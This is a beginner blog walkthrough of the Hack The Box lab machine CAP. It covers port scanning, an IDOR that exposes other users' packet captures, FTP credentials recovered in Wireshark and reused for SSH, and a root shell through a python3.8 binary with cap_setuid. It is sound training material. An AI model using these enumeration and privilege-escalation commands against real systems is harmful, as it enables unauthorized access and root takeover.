Hey there, and welcome to my blog! This space is where I share my journey through the world of ethical hacking, one machine at a time. Whether you’re just getting started or sharpening your skills, I hope these walkthroughs help you learn something new or approach challenges from a different angle.
Today, we’re diving into CAP, an easy-level retired machine from Hack The Box. This box introduces some great concepts like IDOR (Insecure Direct Object Reference), basic network traffic analysis, and privilege escalation through Linux capabilities — making it a perfect choice for beginners looking to get hands-on with real-world vulnerabilities.
🧠 Hack The Box — CAP
Difficulty: Easy
Skills Learned:
- IDOR (Insecure Direct Object Reference)
- FTP credentials from
.pcap - Privilege escalation via
capabilities - Network analysis using Wireshark
🔍 Enumeration
🔹 Nmap Scan
First step in enumeration is scanning for open ports:
nmap 10.10.10.245
This revealed:
PORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http
We follow up with a more aggressive scan to identify versions and scripts:
nmap -p21,22,80 -sC -sV -Pn 10.10.10.245
Press enter or click to view image in full size
🌐 Web Enumeration (Port 80)
Navigating to http://10.10.10.245, we’re presented with a "Security Dashboard" application.
On interaction with “Security Snapshot”, the app redirects to:
/data/<id>
Example: http://10.10.10.245/data/0
Press enter or click to view image in full size
This reveals that the URL pattern is predictable — suggesting an IDOR (Insecure Direct Object Reference) vulnerability.
🔹 IDOR Exploitation
Manually incrementing the /data/<id> value allows access to other users' PCAP scan results (e.g., /data/1, /data/2, etc.).
✅ TASK 2: The answer to “What is the [something]?” → data
✅ TASK 3: Can you access other users' scans? → yes
🕵️ Packet Capture Analysis (PCAPs)
Once we find a working scan (example: /data/0), we can download a PCAP.
Open the .pcap file in Wireshark and apply a display filter:
ftp
Press enter or click to view image in full size
We observe:
USER nathanPASS Buck3tH4TF0RM3!
Press enter or click to view image in full size
📦 The credentials were transferred in plain text over FTP (expected for non-FTPS servers).
🔐 FTP Access
Using the extracted credentials:
Get Aashraymt’s stories in your inbox
Join Medium for free to get updates from this writer.
ftp 10.10.10.245
- Username:
nathan - Password:
Buck3tH4TF0RM3!
✅ Login successful. While there isn’t much to explore through FTP, these credentials are reused for SSH.
🔐 SSH Access
Press enter or click to view image in full size
You’re dropped into the nathan user shell.
Listing files:
cat user.txt
✅ User Flag Acquired
🔧 Privilege Escalation
Time to check what’s misconfigured or exploitable.
🔹 Capabilities Enumeration
We run LinPEAS or manually inspect capabilities:
getcap -r / 2>/dev/null
We find:
/usr/bin/python3.8 = cap_setuid+ep
This means python3.8 can run with elevated privileges. The cap_setuid+ep allows it to set the UID to root without needing sudo.
🔹 Exploit Python Capability for Root
Launch a root shell:
python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Now verify:
whoami
Output:
root
Navigate to root’s home directory:
cd /rootcat root.txt
✅ Root Flag Acquired
💡 Takeaways
- IDOR is a simple yet powerful vulnerability. Always try predictable IDs in URLs.
- Cleartext credentials in network traffic (like FTP) are highly insecure.
- Linux capabilities can be just as dangerous as SUID binaries.
- Wireshark + PCAPs are treasure troves when analyzed properly.
🧠 Skills Learned
- IDOR Vulnerability Exploitation
- Network Traffic Analysis via Wireshark
- Linux Capabilities Misconfigurations
- Privilege Escalation with
cap_setuid+ep